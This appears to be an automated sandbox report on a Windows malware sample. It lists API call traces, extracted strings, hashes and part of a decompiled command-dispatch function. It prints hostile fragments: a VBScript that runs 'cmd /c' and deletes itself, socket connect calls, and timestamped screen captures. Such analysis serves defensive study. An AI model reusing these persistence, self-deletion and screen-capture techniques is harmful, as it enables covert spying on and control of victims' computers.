                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                                                                • _wgetenv.MSVCRT ref: 00408A1B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                                                                • exit.MSVCRT ref: 00408B3D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                                                                • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                  • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                  • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                                                                • _itoa.MSVCRT ref: 0040F75C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                                                                  • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                                                                  • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                                                                  • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                                                                  • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                                                                  • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                                                                  • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,Function_0001B310,?,Function_0001B310,0041C0C8,Function_0001B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                                                                  • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 1042780377-3785015651
                                                                                • Opcode ID: 00144c1b8b2e9b9337a014d0678191b9883f8d66c678c17fd4e76295d746f7f8
                                                                                • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                                                                • Opcode Fuzzy Hash: 00144c1b8b2e9b9337a014d0678191b9883f8d66c678c17fd4e76295d746f7f8
                                                                                • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00410B20
                                                                                • GdiplusStartup.GDIPLUS(0041BF18,?,00000000,00000000,00000000,00000000), ref: 00410B59
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410B79
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410B85
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 00410BAA
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 00410BBC
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410BDC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BE8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BF4
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00410BFD
                                                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00410C04
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C17
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C2A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00415898), ref: 00410C89
                                                                                • Sleep.KERNEL32(000003E8), ref: 00410CA6
                                                                                • GetLocalTime.KERNEL32(?), ref: 00410CB1
                                                                                • swprintf.MSVCRT(?,00416AC0,?,?,?,?,?,?), ref: 00410CF4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,?,00415898), ref: 00410D1A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415898), ref: 00410D2A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00415898), ref: 00410D3A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00415898), ref: 00410D49
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D55
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D61
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D6D
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00415898), ref: 00410D7D
                                                                                  • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                                                                  • Part of subcall function 0041093F: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                                                                  • Part of subcall function 0041093F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                                                                  • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                                                                  • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                                                                  • Part of subcall function 0041093F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                                                                  • Part of subcall function 0041093F: DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                                                                  • Part of subcall function 0041093F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                                                                  • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                                                                  • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                                                                  • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                                                                  • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00415898), ref: 00410D9B
                                                                                • atoi.MSVCRT ref: 00410DA2
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00415898), ref: 00410DB0
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00415898), ref: 00410DC9
                                                                                • atoi.MSVCRT ref: 00410DD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@1@@G@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?data@?$basic_string@V01@$?size@?$basic_string@Sleepatoi$?length@?$basic_string@CreateD@1@@DeleteDirectoryFileGdiplusH_prologLocalStartupTimeswprintf
                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                • API String ID: 628183228-3790400642
                                                                                • Opcode ID: a69d4cdc855c6144f30bba46eeaefe78faf24bc517be1be6c48fa41dadb81de4
                                                                                • Instruction ID: 09d63aef6d3d8e876cb0f678efb75e9f291bc689162efedecff38abdc591dce5
                                                                                • Opcode Fuzzy Hash: a69d4cdc855c6144f30bba46eeaefe78faf24bc517be1be6c48fa41dadb81de4
                                                                                • Instruction Fuzzy Hash: 9C71A37190061DEBCB15ABA0DC8DBEE7778AB84305F1480AAF509A7191EB784AC58F5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 21%
                                                                                			E00410F04(intOrPtr* __eax, void* __eflags, char _a8) {
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				char _v40;
                                                                                				char _v56;
                                                                                				char _v72;
                                                                                				char _v88;
                                                                                				char _v104;
                                                                                				char _v120;
                                                                                				char _v136;
                                                                                				char _v152;
                                                                                				char _v168;
                                                                                				char _v184;
                                                                                				char _v200;
                                                                                				char _v216;
                                                                                				void* _t69;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				void* _t76;
                                                                                				void* _t78;
                                                                                				char* _t83;
                                                                                				void* _t85;
                                                                                				void* _t86;
                                                                                				void* _t88;
                                                                                				char* _t92;
                                                                                				void* _t94;
                                                                                				void* _t95;
                                                                                				void* _t97;
                                                                                				char* _t101;
                                                                                				void* _t103;
                                                                                				void* _t104;
                                                                                				void* _t106;
                                                                                				char* _t110;
                                                                                				void* _t112;
                                                                                				char* _t118;
                                                                                				char* _t119;
                                                                                				char* _t120;
                                                                                				intOrPtr* _t123;
                                                                                				void* _t125;
                                                                                				void* _t127;
                                                                                				char* _t130;
                                                                                				char* _t135;
                                                                                				char* _t136;
                                                                                				char* _t137;
                                                                                				intOrPtr _t139;
                                                                                				void* _t230;
                                                                                				void* _t233;
                                                                                				void* _t235;
                                                                                				void* _t236;
                                                                                				void* _t241;
                                                                                				void* _t242;
                                                                                				void* _t247;
                                                                                				void* _t248;
                                                                                				void* _t253;
                                                                                				void* _t254;
                                                                                				void* _t264;
                                                                                				void* _t265;
                                                                                
                                                                                				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                                                                				_t139 =  *__eax;
                                                                                				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z( *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                                                                				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				E004129EB(__eflags,  &_v20,  &_a8, 0x41b310,  &_v40,  &_v40, 1);
                                                                                				_t233 = _t230 + 0x24;
                                                                                				_t69 = _t139 - 1;
                                                                                				if(_t69 == 0) {
                                                                                					E00412855(_t233 - 0xc, _t233 - 0xc, E004113C9( &_v216));
                                                                                					E004020C2(0x41c130);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(0x79);
                                                                                					L26:
                                                                                					_t74 = E004017DD( &_v20);
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					return _t74;
                                                                                				}
                                                                                				_t75 = _t69 - 1;
                                                                                				if(_t75 == 0) {
                                                                                					_t76 = E004119AD( &_v20, 0);
                                                                                					_t235 = _t233 - 0x10;
                                                                                					_push(_t76);
                                                                                					E00412881(_t76);
                                                                                					_t78 = E00411700(_t235);
                                                                                					_t236 = _t235 + 0x10;
                                                                                					__eflags = _t78;
                                                                                					if(_t78 == 0) {
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                                                                						_push(0x80);
                                                                                						L14:
                                                                                						E004020C2(0x41c130);
                                                                                						goto L26;
                                                                                					}
                                                                                					_push(E004119AD( &_v20, 1));
                                                                                					_push(0x41b310);
                                                                                					_push(E004119AD( &_v20, 0));
                                                                                					_t83 =  &_v184;
                                                                                					_push(_t83);
                                                                                					L00414140();
                                                                                					_push(_t83);
                                                                                					L00414140();
                                                                                					E004020C2(0x41c130, 0x7a, _t236 - 0x10);
                                                                                					L23:
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					goto L26;
                                                                                				}
                                                                                				_t85 = _t75 - 1;
                                                                                				if(_t85 == 0) {
                                                                                					_t86 = E004119AD( &_v20, 0);
                                                                                					_t241 = _t233 - 0x10;
                                                                                					_push(_t86);
                                                                                					E00412881(_t86);
                                                                                					_t88 = E00411760(_t241);
                                                                                					_t242 = _t241 + 0x10;
                                                                                					__eflags = _t88;
                                                                                					if(_t88 == 0) {
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                                                                						_push(0x81);
                                                                                						goto L14;
                                                                                					}
                                                                                					_push(E004119AD( &_v20, 1));
                                                                                					_push(0x41b310);
                                                                                					_push(E004119AD( &_v20, 0));
                                                                                					_t92 =  &_v152;
                                                                                					_push(_t92);
                                                                                					L00414140();
                                                                                					_push(_t92);
                                                                                					L00414140();
                                                                                					E004020C2(0x41c130, 0x7b, _t242 - 0x10);
                                                                                					goto L23;
                                                                                				}
                                                                                				_t94 = _t85 - 1;
                                                                                				if(_t94 == 0) {
                                                                                					_t95 = E004119AD( &_v20, 0);
                                                                                					_t247 = _t233 - 0x10;
                                                                                					_push(_t95);
                                                                                					E00412881(_t95);
                                                                                					_t97 = E00411859(_t247);
                                                                                					_t248 = _t247 + 0x10;
                                                                                					__eflags = _t97;
                                                                                					if(_t97 == 0) {
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                                                                						_push(0x82);
                                                                                						goto L14;
                                                                                					}
                                                                                					_push(E004119AD( &_v20, 1));
                                                                                					_push(0x41b310);
                                                                                					_push(E004119AD( &_v20, 0));
                                                                                					_t101 =  &_v120;
                                                                                					_push(_t101);
                                                                                					L00414140();
                                                                                					_push(_t101);
                                                                                					L00414140();
                                                                                					E004020C2(0x41c130, 0x7c, _t248 - 0x10);
                                                                                					goto L23;
                                                                                				}
                                                                                				_t103 = _t94 - 1;
                                                                                				if(_t103 == 0) {
                                                                                					_t104 = E004119AD( &_v20, 0);
                                                                                					_t253 = _t233 - 0x10;
                                                                                					_push(_t104);
                                                                                					E00412881(_t104);
                                                                                					_t106 = E004118C0(_t253);
                                                                                					_t254 = _t253 + 0x10;
                                                                                					__eflags = _t106;
                                                                                					if(_t106 == 0) {
